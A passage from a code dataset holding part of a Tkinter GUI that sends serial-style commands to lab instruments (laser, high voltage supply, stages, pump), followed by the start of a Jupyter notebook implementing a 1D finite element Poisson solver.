automation_lock.release()\n\ndef SETLPOWER_Thread(watts=1):\n \"\"\"\n Set Laser Power\n CMD: \t\t\tSETLPWR [watts]\n Device Name: \tOBISLaser\n Response: \t\tOK________\\n\n Example: \t\tSETLPWR___0.01600\\n\n Description: \t\tWill set the current output power (in watts).\n\n Still need to test\n :param watts:\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n watts = str(watts)\n size = 94 + len(watts)\n name = 'OBISLaser'\n args = watts\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SETLPWR\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \"+out)\n finally:\n automation_lock.release()\n\ndef SETLSTATE_Thread(state=\"OFF\"):\n \"\"\"\n Turn Laser ON or OFF\n CMD: \t\t\tSETLSTATE [ON|OFF]\n Device Name: \tOBISLaser\n Response: \t\tOK________\\n\n Example:\t\tSETLSTATE_OFF\\n\n Description:\t\tWill turn on or off the laser.\n\n Still need to test\n Command to turn on the OBIS Laser on/off\n :param state: \"ON\" or \"OFF\" (default)\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94 + len(state)\n name = 'OBISLaser'\n args = state\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SETLSTATE\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \"+out)\n finally:\n automation_lock.release()\n\n\n\n\"\"\"\nSolution Stage X and Z\n\"\"\"\ndef SXLFTBIG_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXLFTBIG\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef SXRGHTBIG_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXRGHTBIG\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n 
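# Block on the device acknowledgement before the lock is released, so\n        # stage commands issued from different threads cannot interleave.\n        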
out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n # logging.info(\"releasing lock from\")\n automation_lock.release()\n\n\ndef SXLFTSM_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXLFTSM\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef SXRGHTSM_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXRGHTSM\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef STAGEZUP_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"STAGEZUP\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef SXSAMPLE_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXSAMPLE\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef SXBUFFER_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXBUFFER\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef SXWATER_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXWATER\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef SXWASTE_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SXWASTE\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = 
proc.stdout.readline()\n        logging.debug(\"out = \" + out)\n    finally:\n        automation_lock.release()\n    return\n\ndef STAGEZDN_Thread():\n    \"\"\"\n    STAGEZDN: move the solution stage down along Z.\n    :return:\n    \"\"\"\n    global proc, cnum, automation_lock\n    automation_lock.acquire()\n    try:\n        size = 94\n        name = 'Pi'\n        args = ''\n        cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n              {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"STAGEZDN\", \"args\": args}\n        proc.stdin.write(cmd)\n        proc.stdin.flush()\n        cnum += 1\n        out = proc.stdout.readline()\n        logging.debug(\"out = \" + out)\n    finally:\n        automation_lock.release()\n\n\n\"\"\"\nHigh Voltage Power Supply\n\"\"\"\ndef GETVI_Thread2():\n    \"\"\"\n    I don't think I need this thread but just keep it as a reference...\n    :return:\n    \"\"\"\n    counter = 0\n\n    global proc\n    global cnum\n    size = 94\n    name = 'HighVoltageSupply'\n    args = ''\n    cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n          {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GETVI\", \"args\": args}\n    while(counter<5):\n        proc.stdin.write(cmd)\n        proc.stdin.flush()\n        cnum+=1\n        out = proc.stdout.readline()\n        logging.debug(\"out = \" + out)\n        time.sleep(5)\n        counter+=1\n\ndef on_setv_button_click(entry):\n    value = entry.get()\n    global proc\n    global cnum\n    size = 94 + len(value)\n    name = 'HighVoltageSupply'\n    args = value\n    cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n          {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SETV\", \"args\": args}\n    proc.stdin.write(cmd)\n    proc.stdin.flush()\n    out = proc.stdout.readline()\n    logging.debug(\"out = \"+out)\n    cnum+=1\n\ndef GETVI_Thread():\n    \"\"\"\n    Query voltage and current from the high voltage supply.\n    :return:\n    \"\"\"\n    global proc, cnum, automation_lock\n    automation_lock.acquire()\n    try:\n        size = 94\n        name = 'HighVoltageSupply'\n        args = ''\n        cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n              {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GETVI\", \"args\": args}\n        proc.stdin.write(cmd)\n        proc.stdin.flush()\n        cnum += 1\n        out = proc.stdout.readline()\n        logging.debug(\"out = \" + out)\n    finally:\n        automation_lock.release()\n\ndef SETV_Thread(set_vol=\"10\"):\n    \"\"\"\n    Set the output voltage (in volts) of the high voltage supply.\n    :param set_vol:\n    :return:\n    \"\"\"\n    global proc, cnum, automation_lock\n    automation_lock.acquire()\n    try:\n        set_vol = str(set_vol)\n        size = 94 + len(set_vol)\n        name = 'HighVoltageSupply'\n        args = set_vol\n        cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n              {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SETV\", \"args\": args}\n        proc.stdin.write(cmd)\n        proc.stdin.flush()\n        cnum += 1\n        out = proc.stdout.readline()\n        logging.debug(\"out = \"+out)\n    finally:\n        automation_lock.release()\n\ndef continuous_GETVI():\n    # global automation_lock\n\n    setv_thread1 = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"10\"})\n    setv_thread1.start()\n    minutes = 3\n    t_end = time.time()+(60*minutes)\n    # Loops for 3 minutes ^\n    while time.time() < t_end:\n        getvi_THREAD1 = Thread(target=GETVI_Thread)\n        getvi_THREAD1.start()\n        setv_thread0 = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"0\"})\n        setv_thread0.start()\n        getvi_THREAD = Thread(target=GETVI_Thread)\n        getvi_THREAD.start()\n\n        getvi_THREAD1.join()\n        setv_thread1.join()\n        setv_thread0.join()\n        getvi_THREAD.join()\n    logging.info(\"Finished continuous_GETVI\")\n\ncnum = 1\n\n\"\"\"\nLuna Server Process\n\"\"\"\ncmd = [\n    \"python\",\n    \"../LunaSrv/lunasrv.py\"\n]\n# proc is created in the __main__ block below\n\n\"\"\"\nstart GUI\n\"\"\"\n\n
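Every `*_Thread` function above repeats the same acquire/format/write/read/release sequence and differs only in the command, device name, and arguments. A hedged refactor sketch (not in the original file) that those functions could delegate to; it assumes the module globals `proc`, `cnum`, `automation_lock`, and the `logging` import set up earlier:

```python
def send_locked_command(command, device_name='Pi', args=''):
    """Serialize one command, send it to LunaSrv, and return its reply."""
    global cnum
    with automation_lock:  # threading.RLock supports the context-manager protocol
        size = 94 + len(args)
        cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\n' % \
              {"cnum": cnum, "size": size, "deviceName": device_name,
               "cmd": command, "args": args}
        proc.stdin.write(cmd)
        proc.stdin.flush()
        cnum += 1
        out = proc.stdout.readline()
        logging.debug("out = " + out)
        return out

# e.g. SXWATER_Thread() would reduce to: send_locked_command("SXWATER")
```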
class LunaUI(Tk):\n    def setReaderPipe(self, pipe):\n        self._pipe = pipe\n\n    def __init__(self):\n        Tk.__init__(self)\n\n    def quit(self):\n        self.destroy()\n\n\nluna = LunaUI()\n\nif __name__ == '__main__':\n    proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n    # Check if proc returned anything...\n    proc.poll()  # populate returncode in case LunaSrv already exited\n    if proc is None or proc.returncode is not None:\n        if proc.returncode is not None:\n            print (\"LunaSrv exited immediately with a return code \" + str(proc.returncode))\n        else:\n            print (\"Failed to start LunaSrv\")\n        sys.exit(-1)\n    \"\"\"\n    Main difference here with Lock, Threads, along with the gui\n    \"\"\"\n    automation_lock = RLock()\n    \"\"\"\n    1) Start reader_thread\n    \"\"\"\n    reader_thread = Thread(target=the_reader_thread)\n    # Set the thread as a daemon thread, aka when the gui closes down, the thread also ends.\n    reader_thread.daemon = True\n    reader_thread.start()\n\n    \"\"\"Title ('Optokey')\"\"\"\n    luna.wm_title(\"Status Window\")\n    title_label = Label(luna, text=\"DEMO GUI\", fg=\"green\", font=(\"Helvetica\", 16))\n    title_label.grid(row=0, column=0, columnspan=8)\n\n    current_status_label = Label(luna, text=\"Current Status\")\n    current_status_label.grid(row=1, column=0, columnspan=4)\n    list_box = Listbox(luna, width=40)\n    list_box.grid(row=2, column=0, columnspan=4)\n\n    #### START/SHUTDOWN ####\n\n    start_shutdown_label = Label(luna, text=\"0) Start/Shutdown\")\n    start_shutdown_label.grid(row=3, column=0, columnspan=2)\n    start_button = Button(luna, text=\"START\", command=on_send_button_click)\n    start_button.grid(row=3, column=2)\n\n    shutdown_button = Button(luna, text=\"Shutdown\", command=shutdown_button_click)\n    shutdown_button.grid(row=3, column=3)\n\n    \"\"\"##### Capillary Heater #####\"\"\"\n    capillary_heater_label = Label(luna, text=\"1) Capillary Heater: \")\n    capillary_heater_label.grid(row=4, column=0, columnspan=4)\n\n    turn_on_cap_heater_button = Button(luna, text=\"Turn On Heater\", command=CAPHEATON_Thread)\n    turn_on_cap_heater_button.grid(row=5, column=0, columnspan=2)\n    turn_off_cap_heater_button = Button(luna, text=\"Turn Off Heater\", command=CAPHEATOFF_Thread)\n    turn_off_cap_heater_button.grid(row=5, column=2, columnspan=2)\n\n    cap_heater_current_temp_label = Label(luna, text=\"Current Temp (C):\")\n    cap_heater_current_temp_label.grid(row=6, column=0)\n    cap_heater_current_temp = StringVar()\n    cap_heater_current_temp_dynamic_label = Label(luna, textvariable=cap_heater_current_temp, width=10)\n    cap_heater_current_temp_dynamic_label.grid(row=6, column=1, columnspan=2)\n    gett_cap_heater_button = Button(luna, text=\"CAPGETT\", command=gett_cap_heater_button_click)\n    gett_cap_heater_button.grid(row=6, column=3)\n\n    cap_heater_set_temp_label = Label(luna, text=\"Set Temp (C):\")\n    cap_heater_set_temp_label.grid(row=7, column=0)\n    cap_heater_set_temp_entry = Entry(luna)\n    cap_heater_set_temp_entry.grid(row=7, column=1, columnspan=2)\n\n    sett_cap_heater_button = Button(luna, text=\"CAPSETT\",\n                                    command=lambda: sett_cap_heater_button_click(cap_heater_set_temp_entry))\n    sett_cap_heater_button.grid(row=7, column=3)\n\n    \"\"\"High Voltage Supply\"\"\"\n    high_voltage_label = Label(luna, text=\"2) High Voltage Supply\")\n    high_voltage_label.grid(row=8, column=0, columnspan=4)\n\n    voltage_label = Label(luna, text=\"Voltage (V):\")\n    current_label = Label(luna, text=\"Current (A):\")\n\n    voltage_label.grid(row=9, column=0)\n    current_label.grid(row=9, column=2)\n\n    current_volts = StringVar()\n    current_amps = StringVar()\n\n    current_volts_dynamic_label = 
Label(luna, textvariable=current_volts, width=10)\n    current_amps_dynamic_label = Label(luna, textvariable=current_amps, width=10)\n    current_volts_dynamic_label.grid(row=10, column=1)\n    current_amps_dynamic_label.grid(row=10, column=3)\n\n    getvi_button = Button(luna, text=\"GETVI\", command=GETVI_Thread)\n    getvi_button.grid(row=11, column=3)\n\n    # Set voltage row on GUI\n    set_voltage_label = Label(luna, text=\"set volt:\")\n    set_voltage_label.grid(row=11, column=0)\n    set_voltage_entry = Entry(luna)\n    set_voltage_entry.grid(row=11, column=1)\n    setv_button = Button(luna, text=\"SETV\", command=lambda: on_setv_button_click(set_voltage_entry))\n    setv_button.grid(row=11, column=2)\n    \"\"\"##### Laser Motor #####\"\"\"\n    laser_motor_label = Label(luna, text=\"3) Laser Motor\")\n    laser_motor_label.grid(row=12, column=0, columnspan=4)\n\n    # assumes LASLEFT_Thread is defined alongside LASRIGHT_Thread above\n    lm_moveleft_button = Button(luna, text=\"LASLEFT\", command=LASLEFT_Thread)\n    lm_moveleft_button.grid(row=13, column=1)\n    lm_moveright_button = Button(luna, text=\"LASRIGHT\", command=LASRIGHT_Thread)\n    lm_moveright_button.grid(row=13, column=2)\n\n    lm_lmhome_button = Button(luna, text=\"LMHOME\", command=LMHOME_Thread)\n    lm_lmhome_button.grid(row=14, column=1)\n    lm_capready_button = Button(luna, text=\"CAPREADY\", command=CAPREADY_Thread)\n    lm_capready_button.grid(row=14, column=2)\n\n    \"\"\"##### Gel Pump #####\"\"\"\n    gel_pump_label = Label(luna, text=\"4) Gel Pump\")\n    gel_pump_label.grid(row=15, column=0, columnspan=4)\n\n    gp_home_button = Button(luna, text=\"GPHOME\", command=GPHOME_Thread)\n    gp_home_button.grid(row=16, column=1)\n\n    gp_start_button = Button(luna, text=\"GPSTART\", command=GPSTART_Thread)\n    gp_start_button.grid(row=16, column=2)\n\n    gp_up_button = Button(luna, text=\"GPUP\", command=gp_up_button_click)\n    gp_up_button.grid(row=18, column=1)\n\n    gp_down_button = Button(luna, text=\"GPDOWN\", command=gp_down_button_click)\n    gp_down_button.grid(row=18, column=2)\n\n    \"\"\" Stage X and Z\"\"\"\n    stage_x_and_z_label = Label(luna, text=\"5) Solution Stage X and Z\")\n    stage_x_and_z_label.grid(row=20, column=0, columnspan=4)\n\n    z_moveup_button = Button(luna, text=\"ZUP\", command=STAGEZUP_Thread)\n    z_moveup_button.grid(row=21, column=2)\n    z_movedown_button = Button(luna, text=\"ZDOWN\", command=STAGEZDN_Thread)\n    z_movedown_button.grid(row=22, column=2)\n\n    x_sample_button = Button(luna, text=\"SXSAMPLE\", command=go_to_sample)\n    x_sample_button.grid(row=24, column=0)\n    x_buffer_button = Button(luna, text=\"SXBUFFER\", command=go_to_buffer)\n    x_buffer_button.grid(row=24, column=1)\n    x_water_button = Button(luna, text=\"SXWATER\", command=go_to_water)\n    x_water_button.grid(row=24, column=2)\n    x_waste_button = Button(luna, text=\"SXWASTE\", command=go_to_waste)\n    x_waste_button.grid(row=24, column=3)\n    \"\"\"##### Fluidic Valve #####\"\"\"\n    fluidic_valve_label = Label(luna, text=\"6) LAB SMITH Fluid Valve: \")\n    fluidic_valve_label.grid(row=25, column=0, columnspan=4)\n\n    valve_set = IntVar()\n    valve_set.set(3)\n    valve_options = [\n        (\"A\", 1),\n        (\"B\", 2),\n        (\"CLOSED\", 3)\n    ]\n    for txt, val in valve_options:\n        radio_button = Radiobutton(luna, text=txt, variable=valve_set, command=set_fluidic_valve_clicked, value=val)\n        radio_button.grid(row=26, column=val)\n\n    \"\"\"##### Spectrometer #####\"\"\"\n    # spectrometer_label = Label(luna, text=\"8) Spectrometer: \")\n    # spectrometer_label.grid(row=27, column=0, columnspan=4)\n    #\n    # 
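One caveat about the button wiring above: despite their names, callbacks such as `GPHOME_Thread` run synchronously on the Tk event loop when clicked, so the GUI freezes for the duration of each blocking `proc.stdout.readline()`. A small wrapper (a sketch, not in the original file; `Thread` is already imported for the reader thread) that actually dispatches a callback to a worker thread:

```python
def run_async(fn):
    def _launch():
        worker = Thread(target=fn)
        worker.daemon = True  # don't keep the process alive after the GUI closes
        worker.start()
    return _launch

# usage: Button(luna, text="GPHOME", command=run_async(GPHOME_Thread))
```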
set_exposure_time_label = Label(luna, text=\"set exposure time:\")\n # set_exposure_time_label.grid(row=28, column=0)\n # set_exposure_time_entry = Entry(luna)\n # set_exposure_time_entry.grid(row=28, column=1, columnspan=2)\n # set_exposure_time_button = Button(luna, text=\"SPCSETEXP\",\n # command=lambda: spectrometer_set_exposure_time_clicked(set_exposure_time_entry))\n # set_exposure_time_button.grid(row=28, column=3)\n #\n # set_spectrometer_filename_label = Label(luna, text=\"filename:\")\n # set_spectrometer_filename_label.grid(row=29, column=0)\n # set_spectrometer_filename_entry = Entry(luna)\n # set_spectrometer_filename_entry.grid(row=29, column=1)\n #\n # set_spectrometer_time_between_label = Label(luna, text=\"time between reads (ms):\")\n # set_spectrometer_time_between_label.grid(row=29, column=2)\n # set_spectrometer_time_between_entry = Entry(luna)\n # set_spectrometer_time_between_entry.grid(row=29, column=3)\n #\n # set_spectrometer_duration_label = Label(luna, text=\"duration (ms):\")\n # set_spectrometer_duration_label.grid(row=30, column=0)\n # set_spectrometer_duration_entry = Entry(luna)\n # set_spectrometer_duration_entry.grid(row=30, column=1)\n #\n # start_continuous_spectrometer_button = Button(luna,\n # text=\"SPCSTARTC\",\n # command=lambda: start_spectrometer_continuous_capture(\n # set_spectrometer_filename_entry,\n # set_spectrometer_time_between_entry,\n # set_spectrometer_duration_entry))\n # start_continuous_spectrometer_button.grid(row=30, column=2)\n # start_continuous_spectrometer_button = Button(luna, text=\"SPCISCRUN\", command=check_continous_capture)\n # start_continuous_spectrometer_button.grid(row=30, column=3)\n\n kill_pi_button = Button(luna, text=\"kill pi\", command=kill_pi_clicked)\n kill_pi_button.grid(row=31, column=1)\n\n start_automation_button = Button(luna, text=\"START AUTO\", command=pt1_run_state_sequence)\n start_automation_button.grid(row=31, column=2)\n\n \"\"\"\n Turn off gui, then terminate the subproccess\n \"\"\"\n luna.mainloop()\n proc.terminate()","sub_path":"LunaGUI/demo_automation2.py","file_name":"demo_automation2.py","file_ext":"py","file_size_in_byte":39779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"265511078","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Part A: Code\n\n# ### QOL\n\n# In[1]:\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# To save .png or not to save .png, that is the question\nsave = True\n\n\n# ### Helper Libraries\n\n# In[2]:\n\n\nimport numpy as np\nimport scipy.sparse as spsp\nfrom scipy.sparse.linalg import spsolve\nimport scipy.integrate as integrate\nfrom scipy.misc import derivative\nimport matplotlib.pyplot as plt\n\n\n# ### Utility Classes\n\n# In[3]:\n\n\nclass Mesh:\n def __init__(self, points):\n # self.p array with the node points (sorted) type : np.array dim: (n_p)\n # self.n_p number of node points type : int\n # self.s array with indices of points per type : np.array dim: (n_s, 2) \n # segment \n # self.n_s number of segments type : int\n # self.bc. 
array with the indices of boundary  type : np.array dim: (2)\n        #              points\n\n        self.p   = points\n        self.n_p = np.size(points,0)\n\n        self.s   = np.vstack((range(self.n_p-1),range(1,self.n_p))).T\n        self.n_s = self.n_p-1\n\n        self.bc  = [0, self.n_p-1]\n\n\nclass V_h:\n    def __init__(self, mesh):\n        # self.mesh Mesh object containing geometric info type: Mesh\n        # self.dim  dimension of the space                type: int\n\n        self.mesh = mesh\n        self.dim  = mesh.p.shape[0]\n\n    def eval(self, xi, x):\n        \"\"\" evaluation of the piecewise linear polynomial given by\n        the coefficients xi, at the point x \n        \"\"\"\n\n        # compute the index of the interval in which x is contained\n        # Assumes valid input\n        # Could optimize further with arrays\n        num = False\n        \n        if type(x) is not np.ndarray and type(x) is not list:\n            x_list = [x]\n            num = True\n        else:\n            x_list = x\n        x_list = np.array(x_list)\n        \n        out = []\n        for xx in x_list:\n            for i,p in enumerate(self.mesh.p):\n                if p > xx:\n                    break\n            i-=1\n\n            # compute the size of the interval\n            h = self.mesh.p[i+1]-self.mesh.p[i]\n\n            # here return the value of the function\n            if i == np.size(xi)-1:\n                ret = xi[i]\n            else:\n                ret = xi[i]*(1-(xx-self.mesh.p[i])/h) + xi[i+1]*(xx-self.mesh.p[i])/h\n            out.append(ret)\n\n        if num:\n            return out[0]\n        return np.array(out)\n\nclass Function:\n    def __init__(self, xi, v_h):\n        self.xi  = xi\n        self.v_h = v_h\n\n    def __call__(self,x):\n        # wrapper for calling eval in V_h\n        v_h = self.v_h\n\n        # use the function defined in v_h\n        return v_h.eval(self.xi, x)\n\n\n# ### Finite Element Method\n\n# In[4]:\n\n\ndef mass_matrix(v_h):\n    # sparse matrix easy to change sparsity pattern\n    # this initializes an empty sparse matrix of \n    # size v_h.dim x v_h.dim\n    M = spsp.lil_matrix((v_h.dim,v_h.dim))\n\n    # for loop\n    for i in range(v_h.mesh.n_s):\n        # extract the indices\n        inx = v_h.mesh.s[i]\n\n        # compute the length of the segment\n        h = v_h.mesh.p[inx[1]]-v_h.mesh.p[inx[0]]\n\n        # add the local mass matrix (h/6) * [[2, 1], [1, 2]]\n        M[i:i+2,i:i+2] += h*(np.identity(2)+1)/6\n\n    return M\n\n\ndef stiffness_matrix(v_h, sigma):\n    # matrix easy to change sparsity pattern\n    S = spsp.lil_matrix((v_h.dim,v_h.dim))\n\n    # for loop\n    for i in range(v_h.mesh.n_s):\n        # extract the indices\n        inx = v_h.mesh.s[i]\n\n        # compute the length of the segment\n        h = v_h.mesh.p[inx[1]]-v_h.mesh.p[inx[0]]\n\n        # sample sigma at the coordinate midpoint of the element\n        a_i = sigma((v_h.mesh.p[inx[0]]+v_h.mesh.p[inx[1]])/2)\n\n        # add the local stiffness matrix (a_i/h) * [[1, -1], [-1, 1]]\n        S[i:i+2,i:i+2] += (a_i/h)*(2*np.identity(2)-1)\n    \n    # No Kappa\n    return S[1:-1,1:-1]\n\n# the load vector is assembled with the trapezoidal rule; one could compare\n# this against Simpson's rule\ndef load_vector(v_h, f):\n    # allocate the vector\n    b = np.zeros(v_h.dim)\n\n    # for loop over the segments\n    for i in range(v_h.mesh.n_s):\n        # extracting the indices\n        inx = v_h.mesh.s[i]\n\n        # computing the length of the interval \n        h = v_h.mesh.p[inx[1]]-v_h.mesh.p[inx[0]]\n\n        # update b\n        b[i:i+2] += h*np.array([f(v_h.mesh.p[inx[0]]), f(v_h.mesh.p[inx[1]])]).T/2\n\n    return b\n\n\n
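For reference, the element blocks assembled above are the standard linear-element matrices: the local mass matrix is (h/6)·[[2,1],[1,2]] and the local stiffness matrix is (a/h)·[[1,-1],[-1,1]]. A quick quadrature check of the mass entries (an illustration, not part of the original notebook):

```python
# On one element [0, h] the two hat functions are phi0 = 1 - x/h and
# phi1 = x/h; their products integrate to h/3 (diagonal) and h/6 (off-diagonal).
import numpy as np
from scipy import integrate

h = 0.25
phi0 = lambda x: 1 - x / h
phi1 = lambda x: x / h

m00 = integrate.quad(lambda x: phi0(x) * phi0(x), 0, h)[0]  # -> h/3
m01 = integrate.quad(lambda x: phi0(x) * phi1(x), 0, h)[0]  # -> h/6
assert np.allclose([m00, m01], [h / 3, h / 6])
```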
def source_assembler(v_h, f, sigma, u_dirichlet):\n    # computing the load vector (use the function above)\n    b = load_vector(v_h,f)\n\n    # extract the interval index for left boundary\n    i_left = v_h.mesh.bc[0]\n\n    # compute the length of the interval\n    h = v_h.mesh.p[i_left+1]-v_h.mesh.p[i_left]\n\n    # sample sigma at the middle point\n    a_left = sigma((v_h.mesh.p[i_left+1]+v_h.mesh.p[i_left])/2)\n\n    # update the source_vector\n    b[1] += a_left/h * u_dirichlet[0]\n\n\n    # extract the interval index for the right boundary\n    i_right = v_h.mesh.bc[1]\n\n    # compute the length of the interval\n    h = v_h.mesh.p[i_right]-v_h.mesh.p[i_right-1]\n    \n    # sample sigma at the middle point\n    a_right = sigma((v_h.mesh.p[i_right]+v_h.mesh.p[i_right-1])/2)\n\n    # update the source_vector\n    b[-2] += a_right/h * u_dirichlet[1]\n\n    # return only the interior nodes\n    return b[1:-1]\n\n\ndef solve_poisson_dirichelet(v_h, f, sigma, \n                             u_dirichlet=np.zeros((2)) ):\n    \"\"\" function to solve the Poisson equation with \n    Dirichlet boundary conditions\n    input:  v_h         function space\n            f           load (python function)\n            sigma       conductivity\n            u_dirichlet boundary conditions\n    output: u           approximation (Function class)\n    \"\"\" \n\n    # we compute the stiffness matrix, we only use the \n    # the interior dof, and we need to convert it to \n    # a csc_matrix\n    S = spsp.csc_matrix(stiffness_matrix(v_h,sigma))\n    # we build the source\n    b = source_assembler(v_h,f,sigma,u_dirichlet)\n    # solve for the interior degrees of freedom\n    u_interior = spsolve(S,b)\n    # concatenate the solution to add the boundary \n    # conditions\n    xi_u = np.concatenate([u_dirichlet[:1], \n                           u_interior, \n                           u_dirichlet[1:]])\n\n    # return the function\n    return Function(xi_u, v_h)\n\n\n# ### Projection/Interpolation Functions\n\n# In[5]:\n\n\ndef pi_h(v_h, f):\n    \"\"\"interpolation function\n    input:  v_h   function space\n            f     function to project\n    output: pih_f function that is the interpolation \n                  of f into v_h\n    \"\"\"\n    # nodal interpolation: the hat-function coefficients are simply\n    # the values of f at the mesh nodes\n    xi = f(v_h.mesh.p)\n    pi_h_f = Function(xi, v_h)\n\n    return pi_h_f\n\n\ndef p_h(v_h, f):\n    \"\"\"projection function\n    input:  v_h  function space\n            f    function to project\n    output: ph_f function that is the projection \n                 of f into v_h\n    \"\"\"\n    # compute load vector\n    b = load_vector(v_h,f)\n\n    # compute Mass matrix and convert it to csc type\n    M = spsp.csc_matrix(mass_matrix(v_h))\n\n    # solve the system\n    xi = spsolve(M,b)\n\n    # create the new function (this needs to be an instance)\n    # of a Function class\n    ph_f = Function(xi,v_h)\n\n    return ph_f\n\n\n# ### Verification Code\n\n# In[6]:\n\n\n# Verify utility functionality\nx = np.linspace(0,1,11)\nmesh = Mesh(x)\nv_h = V_h(mesh)\n\nf_load = 